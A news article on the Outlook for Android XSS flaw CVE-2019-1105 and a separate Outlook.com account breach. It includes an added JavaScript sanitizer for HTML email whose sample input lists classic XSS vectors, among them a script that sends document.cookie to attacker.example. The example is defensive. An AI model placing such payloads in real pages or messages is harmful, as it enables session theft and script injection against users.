
Critical vulnerability in Outlook for Android affects more than 100 million users


Microsoft has disclosed a security vulnerability in its Outlook for Android app. According to its security advisory, versions of Outlook for Android prior to 3.0.88 carry a spoofing vulnerability that lets an attacker perform cross-site scripting (XSS) on the victim's mobile device.

The flaw, tracked as CVE-2019-1105, can be exploited by sending a specially crafted email message to the victim. Once the vulnerable app parses the message, the attacker's script runs in the security context of the current user.

“A spoofing vulnerability exists in the way Microsoft Outlook for Android software parses specifically crafted email messages. An authenticated attacker could exploit the vulnerability by sending a specially crafted email message to a victim,” Microsoft said in its security advisory.

“The attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user. The security update addresses the vulnerability by correcting how Outlook for Android parses specially crafted email messages,” the statement added.
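The attack described in the advisory, a crafted HTML message that the client turns into script running as the user, is the class of bug that a mail client's HTML sanitizer exists to prevent. What follows is an added example, not Microsoft's code and not the actual CVE-2019-1105 payload: an allowlist sanitizer for HTML email bodies in JavaScript, run over a constructed sample message that mixes legitimate markup with generic XSS vectors (a script element, an event-handler attribute, an entity-encoded `javascript:` link, an iframe with `srcdoc`). The element, attribute and URL-scheme allowlists are assumptions chosen for the example.

```javascript
// Added example (not Microsoft's code, not the CVE-2019-1105 payload): an
// allowlist sanitizer for HTML e-mail bodies, the defence a mail client needs
// before it hands an untrusted message to a WebView. Unknown tags, scripts,
// event-handler attributes and URLs outside http(s)/mailto/cid are removed;
// anything that does not parse as a tag is escaped rather than passed through.

const ALLOWED_TAGS = new Set([
  'a', 'b', 'i', 'u', 'em', 'strong', 'p', 'br', 'div', 'span', 'blockquote',
  'ul', 'ol', 'li', 'table', 'tbody', 'tr', 'td', 'th', 'img',
]);
// Elements whose whole content is discarded, not just the tags themselves.
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'template', 'svg', 'math']);
// Per-tag attribute allowlist (assumed for the example); style, srcdoc, formaction etc. are simply absent.
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt', 'width', 'height']) };
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto', 'cid']);

// Sticky regex for one tag: optional '/', a name, attributes (quoted values may
// contain '<' and '>'), optional self-closing slash.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s"'<>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'<>]+))?)*)\s*\/?>/y;
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>]+)))?/g;
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', tab: '\t', newline: '\n' };

// Decode numeric and a few named entities so "java&#115;cript:" or
// "java&Tab;script:" cannot smuggle a scheme past safeUrl().
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const code = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : whole;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? whole : named;
  });
}

// Accept only URLs whose scheme is explicitly allowed. Browsers ignore tabs,
// newlines and leading control characters in URLs ("java\tscript:"), so strip
// ASCII controls and spaces before reading the scheme.
function safeUrl(value) {
  const cleaned = decodeEntities(value).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m !== null && SAFE_SCHEMES.has(m[1]);
}

function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag] || new Set();
  let out = '';
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = decodeEntities(m[2] ?? m[3] ?? m[4] ?? '');
    if (name.startsWith('on') || !allowed.has(name)) continue;   // onerror, onload, style, ...
    if (URL_ATTRS.has(name) && !safeUrl(value)) continue;        // javascript:, data:, vbscript:, relative
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

function sanitizeEmailHtml(html) {
  const out = [];
  let i = 0;
  let skipUntil = null;                 // element whose content is currently being discarded
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) {                    // trailing text
      if (skipUntil === null) out.push(html.slice(i));
      break;
    }
    if (skipUntil === null) out.push(html.slice(i, lt));
    if (html[lt + 1] === '!') {         // comments and declarations are dropped
      const isComment = html.startsWith('<!--', lt);
      const end = html.indexOf(isComment ? '-->' : '>', lt + (isComment ? 4 : 2));
      i = end === -1 ? html.length : end + (isComment ? 3 : 1);
      continue;
    }
    TAG_RE.lastIndex = lt;
    const m = TAG_RE.exec(html);
    if (m === null) {                   // not a well-formed tag: escape the '<' and move on
      if (skipUntil === null) out.push('&lt;');
      i = lt + 1;
      continue;
    }
    const [whole, slash, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (skipUntil !== null) {
      if (slash && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_WITH_CONTENT.has(name)) {
      if (!slash) skipUntil = name;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;        // unknown element: keep its text, drop the tag
    out.push(slash ? `</${name}>` : `<${name}${sanitizeAttrs(name, rawAttrs)}>`);
  }
  return out.join('');
}

// Constructed sample message mixing legitimate markup with classic XSS vectors.
const SAMPLE_EMAIL_HTML = [
  '<p>Hi, your <b>invoice</b> is attached.</p>',
  '<img src="cid:logo@example" alt="logo" onerror="alert(document.cookie)">',
  '<a href="java&#115;cript:alert(1)">Open invoice</a>',
  '<a href="https://example.com/invoice">Real link</a>',
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '<iframe srcdoc="<script>alert(1)</script>"></iframe>',
  '<div>Regards <unknown>team</unknown>, 3 < 5</div>',
].join('\n');

console.log(sanitizeEmailHtml(SAMPLE_EMAIL_HTML));
```

The two design choices worth copying are the allowlist (anything not explicitly permitted is removed, so a new dangerous attribute or element needs no rule) and the fail-closed handling of input the tokenizer cannot parse, which is escaped instead of being forwarded to the renderer. Defence in depth would also disable JavaScript in the WebView that displays the message, so that a slip in the parser does not become script execution in the user's session.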

Microsoft credited several researchers with reporting the flaw: Bryan Appleby of F5 Networks, Sander Vanrapenbusch, Tom Wyckhuys, Eliraz Duek of CyberArk, and Gaurav Kumar. The company has released a fix and advised users to update the Outlook app on their devices; any installation running a version earlier than 3.0.88 should be updated.

Separately, Microsoft recently notified a number of users of its Outlook.com webmail service that their accounts had been affected by a breach. In a lengthy notification, it stated that hackers may have accessed data belonging to those users between January 1, 2019, and March 28, 2019.

“Upon awareness of this issue, Microsoft immediately disabled the compromised credentials, prohibiting their use for any further unauthorized access. Our data indicate that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used. As a result, you may receive phishing emails or other spam mails. You should be careful when receiving any e-mails from any misleading domain name, any e-mail that requests personal information or payment or any unsolicited request from an untrusted source,” it said in a statement.

Microsoft later acknowledged that, for a subset of the affected accounts, the contents of emails, including attachments, could also have been accessed, in addition to email addresses, folder names, and subject lines from both senders and recipients.

It remains unclear what the attackers were after or why they launched the campaign. “We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” the report quoted a Microsoft spokesperson as saying.